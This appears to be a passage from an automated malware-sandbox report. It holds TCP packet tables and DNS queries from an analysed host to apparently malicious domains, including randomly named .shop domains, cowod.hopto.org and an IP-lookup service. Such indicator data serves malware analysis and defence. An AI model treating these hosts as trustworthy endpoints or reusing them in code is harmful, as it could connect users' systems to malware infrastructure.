Sep 27, 2024 00:16:19.738178968 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.738209963 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.738219976 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.738236904 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.738246918 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.738250017 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.738276005 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.738289118 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.738297939 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.738339901 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.738419056 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.738429070 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.738444090 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.738454103 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.738459110 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.738466024 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.738476992 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.738482952 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.738518953 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.827596903 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.827614069 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.827634096 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.827646017 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.827657938 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.827704906 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.827718019 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.827796936 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.827845097 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.827857018 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.827857018 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.827857018 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.827857018 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.827857018 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.827892065 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.827991962 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828002930 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828013897 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828026056 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828035116 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828066111 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828119040 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828160048 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828180075 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828192949 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828205109 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828216076 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828227043 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828227997 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828258038 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828275919 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828377008 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828421116 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828428030 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828432083 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828468084 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828480959 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828484058 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828499079 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828511000 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828521967 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828522921 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828532934 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828540087 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828546047 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828562975 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828593969 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828718901 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828756094 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828761101 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828768969 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828799009 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828818083 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828880072 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828891993 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828902960 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.828921080 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828933954 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.828957081 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.829081059 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829097986 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829109907 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829121113 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829127073 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.829132080 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829139948 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.829144001 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829163074 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.829170942 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829190969 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.829215050 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.829365015 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829391956 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829412937 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829412937 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.829423904 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829435110 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829435110 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.829446077 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829457045 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829457045 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.829468012 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829492092 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.829510927 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.829715967 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829727888 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829737902 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829749107 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829760075 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829763889 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.829771996 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829782009 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.829787016 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.829818964 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.829835892 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.832828045 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.832849979 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.832861900 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.832885981 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.832907915 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.832918882 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.832928896 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.832941055 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.832979918 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.832988024 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.832997084 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833039045 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833065987 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833077908 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833089113 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833106995 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833123922 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833174944 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833187103 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833199024 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833219051 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833247900 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833270073 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833280087 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833317995 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833342075 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833353043 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833381891 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833385944 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833393097 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833405018 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833411932 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833416939 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833432913 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833463907 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833656073 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833669901 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833681107 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833692074 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833703041 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833703995 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833714008 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833729029 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833739996 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833751917 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833761930 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833766937 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833777905 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833782911 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833787918 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833805084 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833815098 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833821058 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833827972 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833838940 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.833842993 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833861113 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.833894014 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.834029913 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.834041119 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.834052086 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.834062099 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.834075928 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.834100008 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.834151983 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.834162951 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.834173918 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.834186077 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.834192991 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.834225893 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.834297895 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.834310055 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.834320068 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.834331989 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.834343910 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.834362030 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.834371090 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:19.834389925 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:19.834420919 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:20.020462990 CEST	49756	443	192.168.2.5	5.75.211.162
Sep 27, 2024 00:16:20.020504951 CEST	443	49756	5.75.211.162	192.168.2.5
Sep 27, 2024 00:16:20.020586014 CEST	49756	443	192.168.2.5	5.75.211.162
Sep 27, 2024 00:16:20.020864964 CEST	49756	443	192.168.2.5	5.75.211.162
Sep 27, 2024 00:16:20.020878077 CEST	443	49756	5.75.211.162	192.168.2.5
Sep 27, 2024 00:16:20.348577976 CEST	49757	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:16:20.348627090 CEST	443	49757	172.67.194.216	192.168.2.5
Sep 27, 2024 00:16:20.348722935 CEST	49757	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:16:20.350166082 CEST	49757	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:16:20.350193977 CEST	443	49757	172.67.194.216	192.168.2.5
Sep 27, 2024 00:16:20.735882044 CEST	443	49756	5.75.211.162	192.168.2.5
Sep 27, 2024 00:16:20.735944986 CEST	49756	443	192.168.2.5	5.75.211.162
Sep 27, 2024 00:16:20.736550093 CEST	49756	443	192.168.2.5	5.75.211.162
Sep 27, 2024 00:16:20.736562967 CEST	443	49756	5.75.211.162	192.168.2.5
Sep 27, 2024 00:16:20.738588095 CEST	49756	443	192.168.2.5	5.75.211.162
Sep 27, 2024 00:16:20.738595963 CEST	443	49756	5.75.211.162	192.168.2.5
Sep 27, 2024 00:16:20.999783039 CEST	443	49757	172.67.194.216	192.168.2.5
Sep 27, 2024 00:16:20.999842882 CEST	49757	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:16:21.001779079 CEST	49757	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:16:21.001799107 CEST	443	49757	172.67.194.216	192.168.2.5
Sep 27, 2024 00:16:21.002055883 CEST	443	49757	172.67.194.216	192.168.2.5
Sep 27, 2024 00:16:21.046327114 CEST	49757	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:16:21.057622910 CEST	49757	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:16:21.057698011 CEST	49757	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:16:21.057770967 CEST	443	49757	172.67.194.216	192.168.2.5
Sep 27, 2024 00:16:21.495588064 CEST	443	49757	172.67.194.216	192.168.2.5
Sep 27, 2024 00:16:21.495687008 CEST	443	49757	172.67.194.216	192.168.2.5
Sep 27, 2024 00:16:21.495805025 CEST	49757	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:16:21.496222019 CEST	49757	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:16:21.496247053 CEST	443	49757	172.67.194.216	192.168.2.5
Sep 27, 2024 00:16:21.496268988 CEST	49757	443	192.168.2.5	172.67.194.216
Sep 27, 2024 00:16:21.496277094 CEST	443	49757	172.67.194.216	192.168.2.5
Sep 27, 2024 00:16:21.502016068 CEST	49758	443	192.168.2.5	104.21.4.136
Sep 27, 2024 00:16:21.502068996 CEST	443	49758	104.21.4.136	192.168.2.5
Sep 27, 2024 00:16:21.502316952 CEST	49758	443	192.168.2.5	104.21.4.136
Sep 27, 2024 00:16:21.502989054 CEST	49758	443	192.168.2.5	104.21.4.136
Sep 27, 2024 00:16:21.503006935 CEST	443	49758	104.21.4.136	192.168.2.5
Sep 27, 2024 00:16:21.687814951 CEST	443	49756	5.75.211.162	192.168.2.5
Sep 27, 2024 00:16:21.687917948 CEST	443	49756	5.75.211.162	192.168.2.5
Sep 27, 2024 00:16:21.687969923 CEST	49756	443	192.168.2.5	5.75.211.162
Sep 27, 2024 00:16:21.687969923 CEST	49756	443	192.168.2.5	5.75.211.162
Sep 27, 2024 00:16:21.688463926 CEST	49756	443	192.168.2.5	5.75.211.162
Sep 27, 2024 00:16:21.688477039 CEST	443	49756	5.75.211.162	192.168.2.5
Sep 27, 2024 00:16:21.689908981 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:21.696690083 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:21.874713898 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:21.874742031 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:21.874753952 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:21.874789953 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:21.874811888 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:21.874816895 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:21.874821901 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:21.874833107 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:21.874844074 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:21.874855042 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:21.874876022 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:21.874898911 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:21.874933958 CEST	49755	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:16:21.875016928 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:21.875029087 CEST	80	49755	147.45.44.104	192.168.2.5
Sep 27, 2024 00:16:21.875039101 CEST	80	49755	147.45.44.104	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 27, 2024 00:15:12.812499046 CEST	192.168.2.5	1.1.1.1	0xdf67	Standard query (0)	wallkedsleeoi.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:14.499344110 CEST	192.168.2.5	1.1.1.1	0xab1a	Standard query (0)	gutterydhowi.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:16.092334986 CEST	192.168.2.5	1.1.1.1	0xb67d	Standard query (0)	ghostreedmnu.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:17.776660919 CEST	192.168.2.5	1.1.1.1	0x53e9	Standard query (0)	offensivedzvju.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:18.933646917 CEST	192.168.2.5	1.1.1.1	0x403f	Standard query (0)	vozmeatillu.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:19.914702892 CEST	192.168.2.5	1.1.1.1	0x7485	Standard query (0)	drawzhotdog.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:20.900908947 CEST	192.168.2.5	1.1.1.1	0x7d85	Standard query (0)	fragnantbui.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:21.957164049 CEST	192.168.2.5	1.1.1.1	0x1e3f	Standard query (0)	stogeneratmns.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:22.958631992 CEST	192.168.2.5	1.1.1.1	0xd351	Standard query (0)	reinforcenh.shop	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:24.008611917 CEST	192.168.2.5	1.1.1.1	0x583d	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:25.307154894 CEST	192.168.2.5	1.1.1.1	0x9da0	Standard query (0)	ballotnwu.site	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:32.238224983 CEST	192.168.2.5	1.1.1.1	0xc3ae	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:36.683727980 CEST	192.168.2.5	1.1.1.1	0x49d	Standard query (0)	hansgborn.eu	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:41.451685905 CEST	192.168.2.5	1.1.1.1	0xe47d	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:16:27.167500973 CEST	192.168.2.5	1.1.1.1	0x96f9	Standard query (0)	cowod.hopto.org	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:16:29.569906950 CEST	192.168.2.5	1.1.1.1	0x4458	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:16:45.786617994 CEST	192.168.2.5	1.1.1.1	0x432c	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Sep 27, 2024 00:15:12.826000929 CEST	1.1.1.1	192.168.2.5	0xdf67	No error (0)	wallkedsleeoi.shop	172.67.194.216	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:12.826000929 CEST	1.1.1.1	192.168.2.5	0xdf67	No error (0)	wallkedsleeoi.shop	104.21.36.139	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:14.515678883 CEST	1.1.1.1	192.168.2.5	0xab1a	No error (0)	gutterydhowi.shop	104.21.4.136	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:14.515678883 CEST	1.1.1.1	192.168.2.5	0xab1a	No error (0)	gutterydhowi.shop	172.67.132.32	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:16.109589100 CEST	1.1.1.1	192.168.2.5	0xb67d	No error (0)	ghostreedmnu.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:16.109589100 CEST	1.1.1.1	192.168.2.5	0xb67d	No error (0)	ghostreedmnu.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:16.460949898 CEST	1.1.1.1	192.168.2.5	0xbb07	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:16.460949898 CEST	1.1.1.1	192.168.2.5	0xbb07	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:17.790101051 CEST	1.1.1.1	192.168.2.5	0x53e9	No error (0)	offensivedzvju.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:17.790101051 CEST	1.1.1.1	192.168.2.5	0x53e9	No error (0)	offensivedzvju.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:18.946145058 CEST	1.1.1.1	192.168.2.5	0x403f	No error (0)	vozmeatillu.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:18.946145058 CEST	1.1.1.1	192.168.2.5	0x403f	No error (0)	vozmeatillu.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:19.927859068 CEST	1.1.1.1	192.168.2.5	0x7485	No error (0)	drawzhotdog.shop	104.21.58.182	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:19.927859068 CEST	1.1.1.1	192.168.2.5	0x7485	No error (0)	drawzhotdog.shop	172.67.162.108	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:20.914067030 CEST	1.1.1.1	192.168.2.5	0x7d85	No error (0)	fragnantbui.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:20.914067030 CEST	1.1.1.1	192.168.2.5	0x7d85	No error (0)	fragnantbui.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:21.972691059 CEST	1.1.1.1	192.168.2.5	0x1e3f	No error (0)	stogeneratmns.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:21.972691059 CEST	1.1.1.1	192.168.2.5	0x1e3f	No error (0)	stogeneratmns.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:22.972831011 CEST	1.1.1.1	192.168.2.5	0xd351	No error (0)	reinforcenh.shop	172.67.208.139	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:22.972831011 CEST	1.1.1.1	192.168.2.5	0xd351	No error (0)	reinforcenh.shop	104.21.77.130	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:24.017741919 CEST	1.1.1.1	192.168.2.5	0x583d	No error (0)	steamcommunity.com	104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:25.317780018 CEST	1.1.1.1	192.168.2.5	0x9da0	No error (0)	ballotnwu.site	172.67.128.144	A (IP address)	IN (0x0001)	false
Sep 27, 2024 00:15:25.317780018 CEST	1.1.1.1	192.168.2.5	0x9da0	No error (0)	ballotnwu.site	104.21.2.13	A (IP address)	IN (0x0001)	false
